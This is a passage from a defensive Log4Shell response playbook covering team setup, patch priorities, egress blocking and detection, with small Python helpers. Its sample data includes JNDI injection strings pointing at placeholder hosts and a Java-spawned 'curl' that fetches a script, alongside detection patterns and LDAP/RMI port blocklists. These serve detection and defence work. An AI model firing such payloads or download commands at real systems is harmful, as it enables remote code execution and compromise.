Slay the Log4Shell Dragon TEAM 1 - Protect and Detect Vulns Playbook
Struggling with how to tackle the Log4J / Log4Shell Dragon and low on resources?
First, start with my “RAPID LOG4SHELL RESPONSE 1-PAGER - 8 STEP CHECKLIST” to begin immediate actions to tackle this issue. In that 1-pager, I provide concise guidance to get started quickly. However, for medium and larger sized companies, this approach might not be enough, although it is a great and immediate start.
Patching alone will likely not meet expectations for the Log4J / Log4Shell vulnerabilities, especially if there is a breach. A more comprehensive approach is required to reduce risk. I’ve therefore put this playbook together to help go above and beyond a patching-only approach, and I hope it proves useful.
My goal was to provide something that would help ensure a high enough level of due diligence for risk reduction of this issue.
In this article I’ll provide a TEAM 1 PLAYBOOK of recommended tasks and guidance.
Here’s what I recommend to respond to this critical vulnerability:
INITIAL STEP – Quickly put together two high-performance teams or HPTs. One team should focus on security engineering related to the issue to enable protection and detection. The second team should focus on compromise detection via hunt and response actions.
Both teams should collaborate closely, but their focus is different and should be worked in parallel. Here’s what I recommend for these two teams and task areas or lines of ops, to be done simultaneously:
Team/Task Area 1 for immediate protective and detective security engineering
- Mission: Protect, instrument and defend the enterprise quickly from Log4J vulnerabilities
- Goal: Complete tasks within 30 days and then transition to longer-term process
Team/Task Area 2 for immediate compromise detection hunt actions and attack response
- Mission: Hunt for signs of Log4J compromise and quickly respond, share, defend
- Goal: Complete tasks within 30 days and then transition to longer-term process
Purpose of this playbook: to provide recommended Immediate Actions and a Response Playbook that answer the question: “What should be done ASAP to Defend Against the Log4Shell Dragon?” This will be done for the above two teams and lines of effort.
Leadership, Cooperation and Communication are Essential Elements of Success
Leaders such as the CISO, directors and managers within IT and Security should put deliberate measures in place to facilitate cooperation and timely communication by the team. This requires top-down leadership and engagement as well as a spirit of cooperation and teamwork. Anyone getting in the way of that is a detriment to the organization and must be effectively dealt with immediately.
Setting up a quick information and response communications portal is a smart move
I liked the example I saw used by the University of Washington Office of the CISO portal for Log4Shell to provide quick and pertinent information to their team:
In fact, if you’re a small or medium-sized organization and only have one or a handful of folks to tackle this issue, then the UW site just mentioned may be a good place to start. However, the items contained herein are probably still doable, and there are many options to select from. Not everything can or should be done; the decision is entirely yours.
Providing a single pane of glass is important (like the UW CISO site mentioned above). It provides for an easy one-to-many portal to communicate with the team and provide timely guidance, updates and resources.
Note how the UW site made it a point to provide specific and detailed instructions to exactly named functional areas within IT and cyber, such as “if you are a systems administrator, do X; if you are a firewall administrator or systems administrator, do Y and Z,” etc. Great approach!
A Team Effort and Can-Do Attitude Required
This is not the time for whining and complaining nor being uncooperative or protecting territory. This is the time for cooperation and team spirit. Leaders must ensure everyone plays nice and does not work against the process due to other priorities.
Why I Did This
You may ask why I spent time putting this together when many other organizations, such as CISA, have already put such things together. That’s simple. I felt the overall method to organize and tackle this for larger enterprises is set up for high friction and potential burnout.
I also think many tools have been tossed out there without a better understanding of their strengths and weaknesses. If you look at my other post where I provided a Log4J Log4Shell scan tool compilation, I provide some additional and noteworthy advice. This advice includes a prioritized list and caveats on the limitations and potential consequences of tool use. Please take a moment to read and heed that advice for any teams planning to tackle this issue comprehensively.
Another point - there is great advice out there, but it seems to mix short and long-term strategies and perhaps key tidbits of information in many places. I decided to analyze these and consolidate to save organizations some time. Also, some advice - though great - may be enhanced by providing a process and framework, such as what I propose here. For example, CISA says:
"Immediately identify, mitigate, and update affected products that use Log4j to the latest patched version." Ref: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
Very true, but also much easier said than done. This could result in chaos if one is not careful. Log4J is probably used by a ton of software and code, far too much to tackle all at once. This must be prioritized and could take time. What should one do immediately?
This is why I've decided to try to put something together as a more consolidated playbook of ideas, concepts and advice to result in a more realistic, risk-based and comprehensive response, using a divide-and-conquer strategy. My goals were to:
- Approach this in a more strategic, risk-based and systematic way with less friction
- Divide up initial response strategy from what should become a longer-term strategy
- Provide advice to help “divide-and-conquer” and achieve “unity-of-effort”
- Provide more consolidated advice in one place as a structured plan and template
- Provide enduring defense-in-depth and other pertinent advice and reminders
- Provide important points to think about as you plan your response and remediation
- Emphasize the human side of things – leadership, communication and teamwork
Note: this first playbook would not have been possible without the generous contributions of the entire cybersecurity community. My hat is off to them for quickly developing many great resources in a short time. Many of these are linked in my articles, reflecting that this is a team effort at the end of the day. I hope this will provide some efficiencies to help others avoid burnout and help make the efforts more manageable and Frictionless.
Caveats: Links, and the advice or tools found at those links, have not necessarily been vetted. The quality of these resources is not known and has not been tested. Visit links and/or follow the advice herein completely at your own risk.
===================================================================
TEAM 1 - IMMEDIATE ACTION PLAYBOOK TO DETECT and PROTECT
====================================================================
OUTLINE
After spending some time to establish leadership, team and organizational communication protocols, the time has come to execute a diligent response. The goal of this information is to provide details to help “Protect, instrument and defend the environment quickly.”
While I have arranged this information to be used in a sequential manner (in case the team is small) I have also arranged it so these tasks can be assigned using a “divide-and-conquer” strategy.
This means network admins, system admins, application admins, cloud admins, security admins, SOC and Incident Response and other teams should be assigned against these tasks, working in parallel. Establish a cadence or “battle rhythm” for management purposes.
Here are the 9 critical steps for TEAM 1 – modify according to your own needs and context:
#1 – QUICKLY LEARN and INSTRUMENT DETECTIONS USING EXISTING SECURITY TOOLS
#2 – PATCH INTERNET-FACING SERVERS AND PRODUCTS FIRST
#3 – BLOCK OUTBOUND DATA TRAFFIC RELATED TO THE LOG4J VULNERABILITY
#4 – DISABLE LOG4J JNDI LOGGING IF NOT NEEDED
#5 – CHANGE PROPERTIES SO NO LOOKUPS OCCUR - IF UNABLE TO PATCH
#6 – INOCULATE AND/OR HOTPATCH IN THE INTERIM IF FEASIBLE
#7 – DEPLOY A WAF (THIS IS A THIN LAYER and AUTOMATED UPDATES ARE A MUST!)
#8 – ISOLATE VULNERABLE SYSTEMS THAT MUST USE JNDI - INTO UNTRUSTED VLAN(s)
#9 – START PATCHING OTHER CRITICAL SYSTEMS, PREPARE TO TRANSITION TO TIGER TEAM for the LONG-TERM
============================================================
REPORTING TEMPLATE - RESPONSIBLE TEAM LEADS - POCs
============================================================
Divide and conquer on all of these major recommended task items and assign responsible points-of-contact or POCs. Tailor as you see fit and based on your risk context. Assign each task to a responsible team lead and specific team functional areas and use a time-based approach for progress and completion.
An example and basic template are provided below. Feel free to cut and paste them into a Word doc and create your own plan of attack:
#1 – QUICKLY LEARN and INSTRUMENT DETECTIONS USING EXISTING SECURITY TOOLS
EXAMPLE
- Who: Cybersecurity SOC and Engineering Teams (may need to form a quick high-performance team, or use existing team and process but escalate as emergency ticket/action)
- Reporting Cycle: Daily Progress Meeting at 1630 PST (establish a cadence or “battle rhythm”)
- Responsible Leader: Jane Doe (responsible for item completion and attends progress meetings)
- By When: 30 Days – No later than X Date
#2 – PATCH INTERNET-FACING SERVERS AND PRODUCTS FIRST
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#3 – BLOCK OUTBOUND DATA TRAFFIC RELATED TO THE LOG4J VULNERABILITY
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#4 – DISABLE LOG4J JNDI LOGGING IF NOT NEEDED
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#5 – CHANGE PROPERTIES SO NO LOOKUPS OCCUR - IF UNABLE TO PATCH
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#6 – INOCULATE AND / OR HOTPATCH IN THE INTERIM IF FEASIBLE
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#7 – DEPLOY A WAF (THIS IS A THIN LAYER and AUTOMATED UPDATES ARE A MUST!)
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#8 – ISOLATE VULNERABLE SYSTEMS THAT MUST USE JNDI - INTO UNTRUSTED VLAN(s)
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#9 – START PATCHING OTHER CRITICAL SYSTEMS, PREPARE TO TRANSITION TO TIGER TEAM for the LONG-TERM
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
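If a script suits your team better than a word doc, the same template can be kept as data. Below is a minimal sketch, not a finished tool. The field names mirror the template above; the class name, helper functions, sample owner and sample date are all hypothetical placeholders.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional


@dataclass
class PlaybookTask:
    """One row of the reporting template (field names mirror the template)."""
    number: int
    title: str
    who: str = "TBD"
    reporting_cycle: str = "TBD"
    responsible_leader: str = "TBD"
    by_when: Optional[date] = None  # None means the date is still TBD
    done: bool = False


def unassigned(tasks):
    """Tasks that still have no responsible leader or no due date."""
    return [t for t in tasks if t.responsible_leader == "TBD" or t.by_when is None]


def overdue(tasks, today):
    """Tasks past their due date that are not marked done."""
    return [t for t in tasks
            if t.by_when is not None and not t.done and t.by_when < today]


# Hypothetical sample data: the owner and date are placeholders only.
tasks = [
    PlaybookTask(1, "Instrument detections using existing security tools",
                 who="SOC and Engineering", reporting_cycle="Daily 1630",
                 responsible_leader="Jane Doe", by_when=date(2022, 1, 15)),
    PlaybookTask(2, "Patch internet-facing servers and products first"),
]

for task in unassigned(tasks):
    print(f"#{task.number} {task.title}: needs a leader and a due date")
```

Printing the unassigned and overdue lists at each progress meeting is one simple way to keep the cadence honest.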
Once these assignments are established, corresponding actions are provided below so teams can get to work on items via “divide-and-conquer.”
==============================================================
TEAM 1 RESPONSE - DETAILED INSTRUCTIONS
===============================================================
Note: Run as many of these in parallel as possible, particularly items #1 and #2 below
========
#1 – QUICKLY LEARN and INSTRUMENT DETECTIONS USING EXISTING SECURITY TOOLS
- This should include FIREWALL, IDS/IPS, EDR, etc. – any pertinent IT tools and logging capabilities that should be set up for detection and query – and automate if able
- The reason I put this one first is because if you lack visibility and detections you’re blind and unable to defend what you cannot see
- Since attacks are already happening - patching externally facing servers especially Apache should be done quickly – this won’t stop already-occurring attacks and already-compromised environments – that’s why TEAM 2 must in parallel HUNT and RESPOND as needed!
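As one idea for getting quick visibility from logs you already collect, here is a minimal sketch that flags log lines containing the `${jndi:` lookup string commonly seen in Log4Shell exploit attempts. The function name and sample lines are hypothetical. The second pattern is only a loose heuristic for obfuscated payloads that nest lookups; expect both false positives and misses, and prefer your vendor's maintained detections where they exist.

```python
import re
from urllib.parse import unquote

# Literal form of the lookup string seen in Log4Shell exploit attempts.
JNDI_LITERAL = re.compile(r"\$\{jndi:", re.IGNORECASE)
# Loose heuristic for obfuscated variants: a "${" nested inside another "${".
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def classify_line(line):
    """Return 'jndi', 'nested-lookup' or None for a single log line."""
    decoded = unquote(line)  # payloads are often URL-encoded in access logs
    if JNDI_LITERAL.search(decoded):
        return "jndi"
    if NESTED_LOOKUP.search(decoded):
        return "nested-lookup"
    return None


# Hypothetical sample lines for illustration only.
sample_lines = [
    "GET /?q=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1",
    "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1",
    "User-Agent: ${${lower:j}ndi:ldap://198.51.100.7/a}",
    "GET /index.html HTTP/1.1",
]

for line in sample_lines:
    print(classify_line(line), "|", line)
```

A hit here only shows that someone tried. It says nothing about whether the attempt succeeded, which is why the hunt work of TEAM 2 still matters.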
A. Focus on Cyber Tool (Antivirus, IDS/IPS, Firewall, EDR) Patching and SIEM Instrumentation
Ensure EDR and Antivirus are running on servers where possible (Apache, Internet-facing/DMZ, etc.) and providing instrumentation to the SIEM with high alerts in case of attacks. This should be tested as well, to be sure the alerts and detections actually work.
These security and IT products must themselves also be updated so that they are protected against Log4J / Log4Shell attacks! As such, have the team lead verify this using two critical metric groups, as follows:
A1. Log4Shell Metric Group 1 – All security, monitoring and SIEM tools and services (aka “cyber capabilities”) have been engineered to protect against Log4Shell (patched, and/or configured, as applicable) and have been tested and verified as not vulnerable:
- Capability 1 – Managed SOC Service provider (as applicable) - Green
- Provider 1 – SOC – Green – Confirmed/tested and documented
- Provider 2 – EDR Managed service – Green - Confirmed and documented
- Etc. as applicable
- Capability 2 – Managed Cloud service provider (as applicable) - Orange
- Provider 1 – AWS – Red – awaiting reply
- Provider 2 – Azure – Green - Confirmed and documented
- Provider 3 – O365 – Yellow – verbal confirmation, awaiting written
- Etc. as applicable
- Capability 3 – PKI Server – Green - Confirmed and documented
- Capability 4 – SIEM – Red – Vulnerable, awaiting vendor patch
- Capability 5 – Secure Email Gateway – Orange – patch avail, not yet deployed
- Capability 6 – Antivirus – Yellow – patch available, deployed, not yet tested/verified
- Capability 7 – EDR/EPP – Green - Confirmed and documented
- Capability 8 – IDS/IPS – Green - Confirmed and documented
- Capability 9 – NGFW – Green - Confirmed and documented
- Capability 10 – SOAR – Green - Confirmed and documented
- Capability 11 – VPN – Green - Confirmed and documented
- Capability 12 – Etc…as applicable (if you don’t have an enterprise cybersecurity capabilities list, this would be the time to create a basic one, so you have an inventory of them and can eventually include them in some form of risk register!)
Note: this is a long process, and only a 1-time static check. This is not continuous risk assessment and control, and thus it is a minimal approach. It is thus highly recommended to automate this testing, validation and verification using tools that can do this in a single pane of glass, as a force-multiplier.
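As a small first step toward automating the status roll-up, the stoplight list can be kept as data and sorted so the worst items surface first. This is a minimal sketch. The severity order (Red, then Orange, Yellow, Green) is an assumption inferred from the example statuses above, and the function name is hypothetical.

```python
# Assumed severity order, worst first, inferred from the example statuses.
SEVERITY = {"Red": 0, "Orange": 1, "Yellow": 2, "Green": 3}


def needs_greening(statuses):
    """Return non-Green capabilities, worst color first, then by name."""
    open_items = [(name, color) for name, color in statuses.items()
                  if color != "Green"]
    return sorted(open_items, key=lambda item: (SEVERITY[item[1]], item[0]))


# Sample values copied from the example list above.
metric_group_1 = {
    "PKI Server": "Green",
    "SIEM": "Red",
    "Secure Email Gateway": "Orange",
    "Antivirus": "Yellow",
    "EDR/EPP": "Green",
}

for name, color in needs_greening(metric_group_1):
    print(f"{color:<7}{name}")
```

This only orders the list for reporting. It does not test anything, so the verification behind each color still has to be done and documented by the responsible team.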
A2. Log4Shell Metric Group 2 – All security cyber capabilities have been engineered to detect Log4Shell exploits in 2 respects:
- A2a. Detection is in place and has been successfully tested and verified to work correctly
- A2b. Corresponding alerts fire successfully to SOC dashboard/attention/ticketing (SOAR-like capability or other orchestration and API-based capability or configs needed) with corresponding medium or high alert per preference and context (example: critical = known exploit, high = unknown if exploited – investigate/hunt (automation preferred), medium = was attacked but not exploited)
for the following (status examples are provided as one idea; do it as you see fit):
- Capability 1 – Managed SOC Service provider (as applicable, and manual) - Orange
- Provider 1 – SOC – Red – unable to verify
- Provider 2 – EDR Managed service – Green - Confirmed and documented
- Etc. as applicable
- Capability 2 – Managed Cloud service provider (as applicable, and manual) - Orange
- Provider 1 – AWS – Red – awaiting reply
- Provider 2 – Azure – Green - Confirmed and documented
- Provider 3 – O365 – Yellow – verbal confirmation, awaiting written
- Etc. as applicable
- Capability 3 – PKI Server – Yellow – Detection confirmed and safely logged; alert not developed
- Capability 4 – SIEM – Red – Not tested
- Capability 5 – Secure Email Gateway – Yellow – Detection tested; alert works, needs tuning/fix
- Capability 6 – Antivirus – Green - Confirmed and documented
- Capability 7 – EDR/EPP – Green - Confirmed and documented
- Capability 8 – IDS/IPS – Green - Confirmed and documented
- Capability 9 – NGFW – Green - Confirmed and documented
- Capability 10 – SOAR – Green - Confirmed and documented
- Capability 11 – VPN – Green - Confirmed and documented
- Etc…as applicable
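The example severity levels given in A2b can be written down as a tiny mapping, so that every tool and ticket uses the same definitions. This is a minimal sketch of that one example scheme. The names below are hypothetical, and your own levels may differ per preference and context.

```python
from enum import Enum
from typing import Optional


class Severity(Enum):
    CRITICAL = "critical"  # known exploit
    HIGH = "high"          # unknown if exploited: investigate/hunt
    MEDIUM = "medium"      # was attacked but not exploited


def alert_severity(exploited: Optional[bool]) -> Severity:
    """Map an attack's exploitation status to the example severity levels.

    exploited=True  means exploitation is confirmed
    exploited=None  means it is not yet known and needs investigation
    exploited=False means an attack was seen but exploitation was ruled out
    """
    if exploited is True:
        return Severity.CRITICAL
    if exploited is None:
        return Severity.HIGH
    return Severity.MEDIUM


print(alert_severity(None).value)
```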
Team 2 metrics will be discussed in the forthcoming Article 2B.
Using the stoplight colors as shown above is one option. Doing so immediately makes your priorities visible to everyone and helps the team prioritize items that need to be "greened up," as they say.
Also, by no means is this a complete list of security tools running in the environment. I recommend the cyber and IT side work together to come up with the list. Then, divide and conquer - in a prioritized way. Report status to CISO and CIO daily or per desired cadence.
B. Other Advice related to ITEM # 1
Article 2B will talk about this and the need for Team 2 to work with Team 1 (the team doing the tasks here) to ensure tests are conducted. This should also provide protection, provided that Antivirus and EDR are kept up to date and configured to block malicious activities related to Log4J.
Focus on INTERNET-FACING SERVERS first (DMZ, bare metal on prem and virtual, containers, cloud-based), with Apache servers foremost. Then move to internal servers when able. Don’t try to tackle everything all at once.
If you are unsure what to patch, then use this list of recommended Log4J vulnerability scanning tools, starting with existing tools in the environment first, such as vulnerability scanners and/or PowerShell.
“Detection and Alerting Assurance” is a must
Ensure Antivirus and EDR instrumentation works and is going to the SIEM from these servers. Be prepared for an uptick in storage requirements and cost when sending more data to the SIEM. This is because NGFW and EDR gather a lot of telemetry.
Some security solutions also offer storage options (30, 60 or 90 days’ worth in some cases). Ideally the organization should have a data lake for retro threat hunting included as part of the solution. If you did not get this included, you should revisit it when negotiating your renewal.
Also, employ other scalable options to realize cost savings. There’s also a smart strategy to store data in a way that’s efficient and cost-effective, as well as compliance-oriented (all of these are needed today). A few of these solutions also include SIEM and analytics as part of their storage and retro-threat-hunt solutions.
Keep all security solutions up-to-date continuously and track/monitor them so that:
A. Patching occurs quickly and is verified continuously
B. Configuration changes not authorized are quickly detected and responded to
C. Alerting effectiveness gaps and tuning requirements get fixed quickly
This is needed for 3 important reasons related to vulnerability management and detection:
- So the tools keep up with the latest Log4J vulnerability and other detections and vulns/RCEs (don’t lose sight of all the other vulnerabilities and RCEs)
- So these solutions themselves are protected from Log4J exploit if vulnerable (this is a possibility, and is why security solutions themselves need defense in depth)
- To fix any bugs with detections and alerting so the SOC can detect and respond quickly
C. Use Existing Security Tool Detections for Log4Shell
Example – EDR. Per Infocyte, here is what to look for using EDR: “If you have EDR on the web server, monitor for suspicious curl, wget, or related commands. Likely the code they try to run first following exploitation has the system reaching out to the command and control server using built-in utilities like this.” Ref: https://www.infocyte.com/blog/2021/12/11/log4j-exploit-detection-cve-2021-44228/ See bottom of this article for additional thoughts about EDR importance.
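To illustrate the kind of query the quote above describes, here is a minimal sketch that filters exported process events for curl or wget launched by a Java process. Narrowing to a Java parent is an assumption added here to reduce noise and is not part of the Infocyte advice. The event keys (`host`, `parent`, `cmdline`) and sample events are hypothetical, so map them to whatever your EDR or SYSMON export actually provides.

```python
import re

# The two utilities named in the quote above, matched as whole words.
DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget)\b", re.IGNORECASE)


def suspicious_events(events, parent_names=("java", "java.exe")):
    """Yield events where a Java process spawned curl or wget.

    Each event is a dict with hypothetical keys 'parent' and 'cmdline'.
    """
    for event in events:
        parent = event.get("parent", "").lower()
        cmdline = event.get("cmdline", "")
        if parent in parent_names and DOWNLOAD_TOOLS.search(cmdline):
            yield event


# Hypothetical sample events for illustration only.
events = [
    {"host": "web01", "parent": "java", "cmdline": "curl -s http://203.0.113.5/x.sh"},
    {"host": "web01", "parent": "bash", "cmdline": "curl https://example.com/health"},
    {"host": "web02", "parent": "java", "cmdline": "ls -la /tmp"},
]

hits = list(suspicious_events(events))
for hit in hits:
    print(hit["host"], hit["cmdline"])
```

Attackers can use other built-in utilities too, so treat this as a starting point and extend the pattern as your threat intel dictates.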
Be sure to keep up with detection specifics for whatever tool you are using – see customer portals for advice or ask vendor security engineers. The cyber threat intelligence team or analyst should make sure this becomes an intelligence priority requirement as well. Analysts must provide critical and timely “threat intel assurance” to users of such tools, the SOC and threat hunters.
Automating this process where possible is also a goal, but may not be possible immediately. However, if it requires only a small effort and can persist, it is worth pursuing at the earliest opportunity.
GET EDR Y'ALL!
If you don’t have EDR, either consider a trial deployment or use SYSMON, and instrument these on critical servers. Prioritize detection alerts based on whether assets are external or internal. These detections should be sent to a SIEM for alerting and response, as Splunk points out below.
If you already have an EDR then this step may not be necessary if alerts are being collected centrally. Security teams should determine their detection requirements and level of detection redundancy and instrumentation needed, based on risk and their defense-in-depth strategy. See below in Appendix A for more information on SYSMON and EDR-based detection advice.
D. Use Existing Vulnerability Management and Scan Tools (like Rapid7, Qualys and Tenable) to detect Log4J vulnerabilities, determine what’s most critical and patch quickly
Links I found – ask vendors or use your customer portals as applicable:
Nessus (and others) may offer a free version for a select number of IP addresses to scan, but don’t quote me. Vendors will surely offer free tests, and Log4J provides a great opportunity to see how well their tools perform before making a purchase decision.
- Don’t be shy – vendors are eager to help – just be sure you develop some criteria for selecting the right product if conducting a trial or proof of concept (POC).
- NMAP also has some Log4Shell scanning plugins; use at your own risk, since free tools do not come with any guarantees
E. If needed, ask your vendors for detection advice and resources to verify and update most current signatures (especially if unable to find any on their sites or in their subscription customer portals.) Products like Splunk and CrowdStrike and others may have detection and hunting query advice or other tidbits at their sites. Here are examples:
=====================================
#2 – PATCH INTERNET-FACING SERVERS AND PRODUCTS FIRST.
Then focus on internal servers, devices, products and libraries, when able. I recommend a transition to a longer-term strategy and Tiger Team upon completion of these playbook items (the 30-day mark is ideal).
Again, if you are unsure what to patch, then use this list of recommended Log4Shell vulnerability scanning tools, starting with existing tools in the environment first, such as vulnerability scanners and/or PowerShell.
- IF POSSIBLE RUN ITEMS #1 and #2 IMMEDIATELY IN PARALLEL (this item and the previous)
- Patching is critical especially for most vulnerable assets exposed to the Internet and must be dealt with quickly
- this is why I included a recommendation above regarding where to start first
- companies should determine their most critical products to patch ASAP via an initial list and then start building an overall master list
- Start on the critical list now; start the master list upon transition to the longer-term Tiger Team or project-based strategy
As mentioned, the focus should first be on externally facing devices and servers (all devices, not just servers!) Test if unsure what these assets are and if reachable by the Internet, and if vulnerable to Log4Shell. Ask the networking and web team to provide a complete list of company Domains and IPs. Use trusted scanners to check and verify nothing is missed.
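Where no scanner is available on a host, a quick filename check can help build the initial critical list. Below is a minimal sketch that walks a directory tree, finds `log4j-core` jars and flags 2.x versions below a chosen minimum. The minimum of 2.17.1 is an assumption for illustration; set it to whatever Apache currently recommends for your Java runtime. The sketch does not handle the backported fix releases for older Java runtimes, and it misses copies of Log4J bundled inside other jars or renamed, so it supplements trusted scanners rather than replacing them.

```python
import os
import re

JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)(?:\.(\d+))?.*\.jar$")
# Assumption: treat 2.x versions below this as needing an upgrade.
MINIMUM_SAFE = (2, 17, 1)


def parse_version(filename):
    """Return (major, minor, patch) from a log4j-core jar name, or None."""
    match = JAR_NAME.match(filename)
    if not match:
        return None
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def needs_upgrade(filename, minimum=MINIMUM_SAFE):
    """True if the jar name is log4j-core 2.x below the minimum version."""
    version = parse_version(filename)
    return version is not None and version[0] == 2 and version < minimum


def find_jars(root):
    """Walk a directory tree and yield (path, version) for log4j-core jars."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            version = parse_version(name)
            if version is not None:
                yield os.path.join(folder, name), version


print(needs_upgrade("log4j-core-2.14.1.jar"))
```

Run `find_jars` against application and server directories on internet-facing hosts first, in line with the priority order above.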
CISO and CIO should agree on a quick timeline in which all external internet-facing servers and assets are patched and defended. I recommend 48 hours or less for all externally facing and Apache servers, for any RCE exploit, anytime. If IT and cyber have not resourced themselves to be able to do that, then I recommend they do so.
Upguard and CISA recommend “updating to the latest version of the Log4j Library
The quickest, and currently most effective, mitigation response is to upgrade all instances of Log4j to latest version…[via] https://logging.apache.org/log4j/2.x/download.html “
Upguard further says: “According to Apache, the vulnerability CVE-2021-45105 is fixed in its latest library version. This should prevent future attacks but it will not remediate any damage caused before the library upgrade. [This is why TEAM 2 is CRITICAL -- to determine compromise!]
Because this vulnerability is so widespread, it is safest to assume that your ecosystem was compromised prior to a library upgrade and to initiate data breach incident responses immediately.” [emphasis mine] Ref: https://www.upguard.com/blog/apache-log4j-vulnerability and earlier mention of CISA’s guidance https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
Patching requires diligent upkeep. Sometimes a patch may provide only a partial fix but may cause other issues that require more patches. This has already been seen with respect to Log4J. Patching is not a fix-and-forget scenario. Nor is it something to solely rely upon.
Keep up with the latest and assign responsibility for this critical function using a trustworthy and reliable method that can endure. Attacks like Hafnium, SolarWinds and Log4Shell should have made this an enduring priority, if it was not already.
=====================================
#3 – BLOCK OUTBOUND DATA TRAFFIC RELATED TO THE LOG4J VULNERABILITY
- I felt this one could be a quick fix with less friction and impact since these services are perhaps rarely used yet can effectively block currently known exploit methods
- Realize as attackers change tactics there could be ways to bypass or use other protocols or means of exploit – also it has been stated below it is not 100% but when is anything?
CISA advises:
“Block specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic.
Outbound LDAP: for most networks, LDAP is used internally, but it is rare for LDAP requests to be routed outside a network. Organizations should block outbound LDAP or use an allowlist for outbound LDAP to known good destinations. Note: this may be difficult to detect on certain ports without a firewall that does application layer filtering.
Remote Method Invocation (RMI): for most networks, RMI is either unused or used for internal sources. Organizations should block outbound RMI or use an allowlist for outbound RMI to known good destinations.
Outbound DNS: organizations using enterprise DNS resolution can block outbound DNS from sources other than identified DNS resolvers. At a minimum, blocking direct outbound DNS from web application servers configured to use enterprise DNS resolution will mitigate the risks to those systems.
Note: blocking attacker internet IP addresses during this event is difficult due to the high volume of scanning from non-malicious researchers and vendors. The false positives on IP addresses are high. Organizations should focus on looking for signs of successful exploitation and not scans.”
Ref: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
Also Snyk says: “A solution here is to update your egress policies, perhaps through your Kubernetes configuration or other mechanisms in your environment to restrict outbound requests that look like they’re performing malicious naming lookups from Log4j.
Similar to WAF, this is not a flawless fix, as it is still possible to construct malicious payloads even without an external LDAP network request (for example, the case described earlier with Tomcat servers) via vulnerable gadgets.”
Ref: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
Echelon Cyber advises this for network restrictions:
- “Using your perimeter firewalls, restrict outbound access from your internet facing servers, particularly web servers
- Change outbound firewall rules from web and application servers to default deny
- Turn off recursive DNS on your web and application servers”
Ref: https://echeloncyber.com/intelligence/entry/log4shell-how-attackers-are-currently-breaking-the-internet-and-how-to-mitigate-log4j
Specifics [ports and protocols] are provided by Peerless:
“Egress Filtering: Implement firewall rules that prevent your servers (and any other device) not requiring unlimited Internet access from making requests to the Internet.
[Best - Whitelist Approach]
“First, create a “Deny All” rule from the Source(s) to the Internet or “Any”/0.0.0.0 if you intend to restrict all access not explicitly allowed by a higher priority rule.
Then, create Allow rules from the Source(s) to any needed Destinations. For example:
Internal Networks or specific destinations.
DNS (53/tcp) and DNS (53/udp) to its configured DNS server addresses.
Microsoft Update (if patches are not internally deployed)”
[Quick-fix - Blacklist Approach]
“If you specifically wish to block the currently known "Log4Shell" exploits, block outbound LDAP (389,1389,636,1636/tcp) [except to legitimate LDAP servers] and outbound Java RMI (1099/tcp,udp).”
[Peerless also provides the following below for what is known so far, just be careful because these things could change as attackers modify their TTPs to include using non-standard ports, obfuscation, etc. Also remember attackers may find other bypasses, so it behooves organizations to develop and be driven by timely and highly specific cyber threat intelligence]
“Log4Shell malware has specifically been using outbound LDAP (389,1389,636,1636/tcp) and outbound Java RMI (1099/tcp,udp). Once the Log4Shell malware has compromised a machine, LDAP / RMI are no longer needed, so the payload it installs will likely communicate over other protocols and ports”
Ref: https://blog.getpeerless.com/what-to-do-about-the-log4j-vulnerabilities
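To check whether existing firewall or flow logs already show traffic that the quick-fix blocklist would stop, the quoted ports can be applied to connection records. This is a minimal sketch. The port numbers come from the Peerless quote above; the function names, the record fields and the choice to treat only RFC 1918 ranges as internal are assumptions for illustration.

```python
import ipaddress

# Ports quoted above for the currently known exploit traffic.
LDAP_TCP_PORTS = {389, 1389, 636, 1636}
RMI_PORTS = {1099}  # tcp and udp

# Assumption: only RFC 1918 space counts as internal in this sketch.
INTERNAL_NETWORKS = [ipaddress.ip_network(net)
                     for net in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    """True if the address falls inside one of the internal networks."""
    address = ipaddress.ip_address(ip)
    return any(address in network for network in INTERNAL_NETWORKS)


def should_block(dst_ip, dst_port, protocol, allowed_ldap_servers=()):
    """Apply the quick-fix blocklist to one outbound connection record."""
    if is_internal(dst_ip):
        return False
    protocol = protocol.lower()
    if protocol == "tcp" and dst_port in LDAP_TCP_PORTS:
        # Outbound LDAP is blocked except to legitimate LDAP servers.
        return dst_ip not in allowed_ldap_servers
    if protocol in ("tcp", "udp") and dst_port in RMI_PORTS:
        return True
    return False


print(should_block("203.0.113.5", 1389, "tcp"))
```

As the quote itself warns, attackers can move to other ports once a machine is compromised, so the default-deny allowlist remains the stronger option.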
=====================================
#4 – DISABLE LOG4J JNDI LOGGING IF NOT NEEDED
- The reason this one is #4 is that, although it effectively kills the exploit process if done right, it may have unintended consequences and needs to be done in every place Log4J logging occurs
- I felt it was an important item but may require some analysis and risk decision process - which could delay things slightly
